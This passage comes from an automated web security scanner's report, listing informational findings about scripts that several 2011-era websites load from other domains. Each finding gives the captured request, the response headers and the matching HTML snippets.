<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmlns:fb="http://www
...[SNIP]...
<![endif]-->
       
               
               <script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js"></script>
...[SNIP]...
<![endif]-->
       
       <script type="text/javascript" src="http://cdn.stumble-upon.com/js/plugins_su.js?v=20110124-01"></script>
...[SNIP]...
<!-- end wrapper -->
       
       <script type="text/javascript" charset="utf-8" src="http://cdn.stumble-upon.com/js/attach_su.js?v=20110124-01"></script>
...[SNIP]...

21.1308. http://www.t-mobile.com/Company/Community.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.t-mobile.com
Path:   /Company/Community.aspx

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://cdn.mercent.com/js/tracker.js
  • http://libs.coremetrics.com/eluminate.js
  • http://s.tmocache.com/Js/Page.js
  • http://s.tmocache.com/assets/scripts/swfObject.js?v=634306440507445748
  • http://s.tmocache.com/htmlservices/assets/scripts/core.js?v=634306440836814424
  • http://s.tmocache.com/htmlservices/assets/scripts/jquery-1.3.2.min.js?v=634306440847282973
  • http://s.tmocache.com/htmlservices/assets/scripts/jquery.smartval.js?v=634306440855095323
  • http://s.tmocache.com/htmlservices/assets/scripts/tmobile.navigation.js?v=634306440863845155
  • http://s.tmocache.com/js/LivePersonChat.js

Request

GET /Company/Community.aspx?tp=Abt_Tab_HandsetRecycling HTTP/1.1
Host: www.t-mobile.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Last-Modified: Mon, 01 Sep 1997 01:03:33 GMT
Server: Microsoft-IIS/7.0
Set-Cookie: TMobileCommon=TeaId=1a4c4817-e07d-4717-85bc-99437711e569; domain=.t-mobile.com; path=/
Set-Cookie: ASP.NET_SessionId=chnwja451k35xk453rmski55; path=/; HttpOnly
X-AspNet-Version: 2.0.50727
Set-Cookie: TMobileCommon=TeaId=1a4c4817-e07d-4717-85bc-99437711e569; domain=.t-mobile.com; path=/
Set-Cookie: ASP.NET_SessionId=chnwja451k35xk453rmski55; path=/; HttpOnly
Set-Cookie: PartnerExpiration=PARTNER=!2%2f8%2f2011+4%3a38%3a47+AM; domain=.t-mobile.com; expires=Wed, 25-Jan-2012 04:38:47 GMT; path=/
Set-Cookie: TMobilePartner=; domain=.t-mobile.com; expires=Wed, 25-Jan-2006 04:38:47 GMT; path=/
Set-Cookie: PartnerExpiration=; domain=.t-mobile.com; expires=Wed, 25-Jan-2006 04:38:47 GMT; path=/
Set-Cookie: TMobileSession=WT=&DCS=; domain=.t-mobile.com; path=/
Date: Tue, 25 Jan 2011 04:38:47 GMT
Connection: close
Content-Length: 41256

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><style type="text/css" media="
...[SNIP]...
<![endif]--><script type="text/javascript" src="http://s.tmocache.com/js/LivePersonChat.js"></script><script type="text/javascript" src="http://s.tmocache.com/js/LivePersonChat.js"></script>
...[SNIP]...
</script><script type="text/javascript" src="http://s.tmocache.com/Js/Page.js"></script>
...[SNIP]...
</script>
<script charset="utf-8" type="text/javascript" src="http://s.tmocache.com/htmlservices/assets/scripts/jquery-1.3.2.min.js?v=634306440847282973"></script><script charset="utf-8" type="text/javascript" src="http://s.tmocache.com/assets/scripts/swfObject.js?v=634306440507445748"></script>
...[SNIP]...
</div>
<script charset="utf-8" type="text/javascript" src="http://s.tmocache.com/htmlservices/assets/scripts/core.js?v=634306440836814424"></script><script charset="utf-8" type="text/javascript" src="http://s.tmocache.com/htmlservices/assets/scripts/jquery.smartval.js?v=634306440855095323"></script><script charset="utf-8" type="text/javascript" src="http://s.tmocache.com/htmlservices/assets/scripts/tmobile.navigation.js?v=634306440863845155"></script><script type="text/javascript" src="http://cdn.mercent.com/js/tracker.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://libs.coremetrics.com/eluminate.js"></script>
...[SNIP]...

21.1309. http://www.thefeast.com/boston/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.thefeast.com
Path:   /boston/

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://api.recaptcha.net/js/recaptcha_ajax.js
  • http://www.nbcudigitaladops.com/hosted/global.js

Request

GET /boston/ HTTP/1.1
Host: www.thefeast.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Last-Modified: Mon, 24 Jan 2011 23:22:48 GMT
X-Server-Name: sj-c14-r8-u31-b7
Content-Type: text/html;charset=utf-8
Expires: Tue, 25 Jan 2011 00:09:31 GMT
Cache-Control: max-age=0, no-cache
Pragma: no-cache
Date: Tue, 25 Jan 2011 00:09:31 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 280280


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://o
...[SNIP]...
</script>
        <script type="text/javascript" src="http://api.recaptcha.net/js/recaptcha_ajax.js"></script>
...[SNIP]...
</script>


<script src="http://www.nbcudigitaladops.com/hosted/global.js"></script>
...[SNIP]...

21.1310. http://www.thefeast.com/boston/Better-Yourself-Get-Smart-with-Our-Cheap-Picks-114487719.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.thefeast.com
Path:   /boston/Better-Yourself-Get-Smart-with-Our-Cheap-Picks-114487719.html

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://api.recaptcha.net/js/recaptcha_ajax.js
  • http://platform.twitter.com/widgets.js
  • http://www.nbcudigitaladops.com/hosted/global.js

Request

GET /boston/Better-Yourself-Get-Smart-with-Our-Cheap-Picks-114487719.html HTTP/1.1
Host: www.thefeast.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Last-Modified: Mon, 24 Jan 2011 23:24:38 GMT
X-Server-Name: sj-c14-r2-u21
Content-Type: text/html;charset=utf-8
Expires: Tue, 25 Jan 2011 00:09:32 GMT
Cache-Control: max-age=0, no-cache
Pragma: no-cache
Date: Tue, 25 Jan 2011 00:09:32 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 255575


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://ope
...[SNIP]...
</script>
        <script type="text/javascript" src="http://api.recaptcha.net/js/recaptcha_ajax.js"></script>
...[SNIP]...
</script>
<script src="http://platform.twitter.com/widgets.js" type="text/javascript"></script>
...[SNIP]...
</script>


<script src="http://www.nbcudigitaladops.com/hosted/global.js"></script>
...[SNIP]...

21.1311. http://www.thefeast.com/boston/Trailer-Park-Boys-Bring-Trash-Talk-at-The-Wilbur-114477904.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.thefeast.com
Path:   /boston/Trailer-Park-Boys-Bring-Trash-Talk-at-The-Wilbur-114477904.html

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://api.recaptcha.net/js/recaptcha_ajax.js
  • http://platform.twitter.com/widgets.js
  • http://www.nbcudigitaladops.com/hosted/global.js

Request

GET /boston/Trailer-Park-Boys-Bring-Trash-Talk-at-The-Wilbur-114477904.html HTTP/1.1
Host: www.thefeast.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Last-Modified: Mon, 24 Jan 2011 23:24:38 GMT
X-Server-Name: dv-c1-r2-u24-b14
Content-Type: text/html;charset=utf-8
Expires: Tue, 25 Jan 2011 00:09:42 GMT
Cache-Control: max-age=0, no-cache
Pragma: no-cache
Date: Tue, 25 Jan 2011 00:09:42 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 255776


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://ope
...[SNIP]...
</script>
        <script type="text/javascript" src="http://api.recaptcha.net/js/recaptcha_ajax.js"></script>
...[SNIP]...
</script>
<script src="http://platform.twitter.com/widgets.js" type="text/javascript"></script>
...[SNIP]...
</script>


<script src="http://www.nbcudigitaladops.com/hosted/global.js"></script>
...[SNIP]...

21.1312. http://www.thefeast.com/boston/shopping/FEAST-SHOP-BOS-A-Puffer-Never-Looked-So-Cute-114479944.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.thefeast.com
Path:   /boston/shopping/FEAST-SHOP-BOS-A-Puffer-Never-Looked-So-Cute-114479944.html

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://api.recaptcha.net/js/recaptcha_ajax.js
  • http://platform.twitter.com/widgets.js
  • http://www.nbcudigitaladops.com/hosted/global.js

Request

GET /boston/shopping/FEAST-SHOP-BOS-A-Puffer-Never-Looked-So-Cute-114479944.html HTTP/1.1
Host: www.thefeast.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Last-Modified: Mon, 24 Jan 2011 23:24:38 GMT
X-Server-Name: sj-c14-r8-u31-b7
Content-Type: text/html;charset=utf-8
Expires: Tue, 25 Jan 2011 00:09:35 GMT
Cache-Control: max-age=0, no-cache
Pragma: no-cache
Date: Tue, 25 Jan 2011 00:09:35 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 282213


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://ope
...[SNIP]...
</script>
        <script type="text/javascript" src="http://api.recaptcha.net/js/recaptcha_ajax.js"></script>
...[SNIP]...
</script>
<script src="http://platform.twitter.com/widgets.js" type="text/javascript"></script>
...[SNIP]...
</script>


<script src="http://www.nbcudigitaladops.com/hosted/global.js"></script>
...[SNIP]...

21.1313. http://www.thisnext.com/pick/new/submit/sociable/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.thisnext.com
Path:   /pick/new/submit/sociable/

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://ajax.googleapis.com/ajax/libs/jquery/1.4.3/jquery.min.js
  • http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.1/dragdrop.js
  • http://edge.quantserve.com/quant.js
  • http://partner.googleadservices.com/gampad/google_service.js
  • http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php
  • http://static.fmpub.net/site/thisnext

Request

GET /pick/new/submit/sociable/?url={u}&name={t} HTTP/1.1
Host: www.thisnext.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 04:39:06 GMT
Server: Apache
Vary: Accept-Encoding,User-Agent
Cache-Control: private
P3P: CP="CAO DSP COR CURi ADMi DEVi IVAi IVDi CONi HISi OUR IND ONL STA",policyref="/w3c/p3p.xml", CP="CAO DSP COR CURi ADMi DEVi IVAi IVDi CONi HISi OUR IND ONL STA",policyref="/w3c/p3p.xml"
Content-Type: text/html; charset=utf-8
Set-Cookie: session=046f9657edcc992948bb669f4e6686bd; path=/
Set-Cookie: browser=173.193.214.243.1295930346514828; path=/; expires=Fri, 22-Jan-21 04:39:06 GMT
Connection: close
Content-Length: 19298

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"

...[SNIP]...
</script>
   
           <script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.3/jquery.min.js"></script>
...[SNIP]...
</script>
   

<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.1/dragdrop.js"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php"></script>
...[SNIP]...
</script>

                   
<script type="text/javascript" src="http://partner.googleadservices.com/gampad/google_service.js"></script>
...[SNIP]...
</script>
   <script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...
<!-- FM Tracking Pixel -->
<script type='text/javascript' src='http://static.fmpub.net/site/thisnext'></script>
...[SNIP]...

21.1314. http://www.tradeonlytoday.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.tradeonlytoday.com
Path:   /

Issue detail

The response dynamically includes the following script from another domain:
  • http://secure-us.imrworldwide.com/v53.js

Request

GET / HTTP/1.1
Host: www.tradeonlytoday.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 00:09:44 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
Set-Cookie: d4dad6935f632ac35975e3001dc7bbe8=l5185bjr0f1asmstu2ppbn0lg1; path=/
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 00:09:44 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
<
...[SNIP]...
</script>
<script type="text/javascript" src="//secure-us.imrworldwide.com/v53.js"></script>
...[SNIP]...

21.1315. http://www.walnecks.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.walnecks.com
Path:   /

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://ajax.googleapis.com/ajax/libs/jquery/1.3.2/jquery.min.js
  • http://d.yimg.com/mi/ywa.js

Request

GET / HTTP/1.1
Host: www.walnecks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 00:10:51 GMT
Server: Apache/2.0.63 (Unix) DAV/2 PHP/5.2.13
X-Powered-By: PHP/5.2.13
Set-Cookie: location=%5B%7B%22ZIP_CODE%22%3A%2275207%22%2C%22STATE_NAME%22%3A%22Texas%22%2C%22CITY_NAME%22%3A%22Dallas%22%7D%5D; expires=Wed, 25-Jan-2012 00:10:51 GMT
Connection: close
Content-Type: text/html
Content-Length: 64629

<!-- dstolweb11-php5b --><!DOCTYPE html>
<html>
<head>
   <title>Classic Motorcycles - Antique and Vintage Motorcycles for Sale - Walnecks.com</title>
   <meta http-equiv="Cache-Control" content="no-cache
...[SNIP]...
<![endif]-->

       <script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.2/jquery.min.js"></script>
...[SNIP]...
<!-- Yahoo! Web Analytics - All rights reserved -->
<script type="text/javascript" src="http://d.yimg.com/mi/ywa.js"></script>
...[SNIP]...

21.1316. http://www.woothemes.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.woothemes.com
Path:   /

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://twitter.com/javascripts/blogger.js
  • http://twitter.com/statuses/user_timeline/woothemes.json?callback=twitterCallback2&count=1
  • http://www.google.com/cse/brand?form=cse-search-box-footer&lang=en

Request

GET / HTTP/1.1
Host: www.woothemes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 00:11:04 GMT
Server: LiteSpeed
Connection: close
X-Powered-By: PHP/5.3.2
Last-Modified: Tue, 25 Jan 2011 00:10:45 GMT
Vary: Cookie
X-Pingback: http://www.woothemes.com/xmlrpc.php
Content-Type: text/html; charset=UTF-8
Content-Length: 25957

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head profile="http://gmpg.org/xfn/1
...[SNIP]...
</div> <script type="text/javascript" src="http://twitter.com/javascripts/blogger.js"></script> <script type="text/javascript" src="http://twitter.com/statuses/user_timeline/woothemes.json?callback=twitterCallback2&amp;count=1"></script>
...[SNIP]...
</form> <script type="text/javascript" src="http://www.google.com/cse/brand?form=cse-search-box-footer&amp;lang=en"></script>
...[SNIP]...

21.1317. http://www.x64bitdownload.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js
  • http://s7.addthis.com/js/152/addthis_widget.js

Request

GET / HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:20:28 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:30:39 GMT
Cache-Control: max-age=600
Pragma: cache
Connection: close
Content-Type: text/html; charset=UTF-8
X-Pad: avoid browser bug
Content-Length: 64487

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content-
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/152/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js" async defer charset="utf-8"></script>
...[SNIP]...

21.1318. http://www.x64bitdownload.com/64-bit-archive-downloads.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /64-bit-archive-downloads.html

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js
  • http://pagead2.googlesyndication.com/pagead/show_ads.js
  • http://s7.addthis.com/js/152/addthis_widget.js

Request

GET /64-bit-archive-downloads.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:59:29 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 16:09:54 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A7%3A%22archive%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A7%3A%22archive%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 93426


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

                                       </script>
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

                                       </script>
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/152/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js" async defer charset="utf-8"></script>
...[SNIP]...

21.1319. http://www.x64bitdownload.com/64-bit-assembling-downloads.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /64-bit-assembling-downloads.html

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js
  • http://pagead2.googlesyndication.com/pagead/show_ads.js
  • http://s7.addthis.com/js/152/addthis_widget.js

Request

GET /64-bit-assembling-downloads.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:38:36 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:48:47 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A10%3A%22assembling%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A10%3A%22assembling%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 72783


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

                                       </script>
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

                                       </script>
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/152/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js" async defer charset="utf-8"></script>
...[SNIP]...

21.1320. http://www.x64bitdownload.com/64-bit-atom-downloads.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /64-bit-atom-downloads.html

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js
  • http://pagead2.googlesyndication.com/pagead/show_ads.js
  • http://s7.addthis.com/js/152/addthis_widget.js

Request

GET /64-bit-atom-downloads.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:50:19 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 16:00:20 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A4%3A%22atom%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A4%3A%22atom%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 89319


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

                                       </script>
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

                                       </script>
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/152/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js" async defer charset="utf-8"></script>
...[SNIP]...

21.1321. http://www.x64bitdownload.com/64-bit-audio-downloads.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /64-bit-audio-downloads.html

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js
  • http://pagead2.googlesyndication.com/pagead/show_ads.js
  • http://s7.addthis.com/js/152/addthis_widget.js

Request

GET /64-bit-audio-downloads.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:39:29 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:49:34 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A5%3A%22audio%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A5%3A%22audio%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 96673


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

                                       </script>
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

                                       </script>
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/152/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js" async defer charset="utf-8"></script>
...[SNIP]...

21.1322. http://www.x64bitdownload.com/64-bit-automatic-downloads.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /64-bit-automatic-downloads.html

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js
  • http://pagead2.googlesyndication.com/pagead/show_ads.js
  • http://s7.addthis.com/js/152/addthis_widget.js

Request

GET /64-bit-automatic-downloads.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:40:47 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:50:59 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A9%3A%22automatic%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A9%3A%22automatic%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 90216


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

                                       </script>
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

                                       </script>
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/152/addthis_widget.js"></script>
...[SNIP]...
</script>
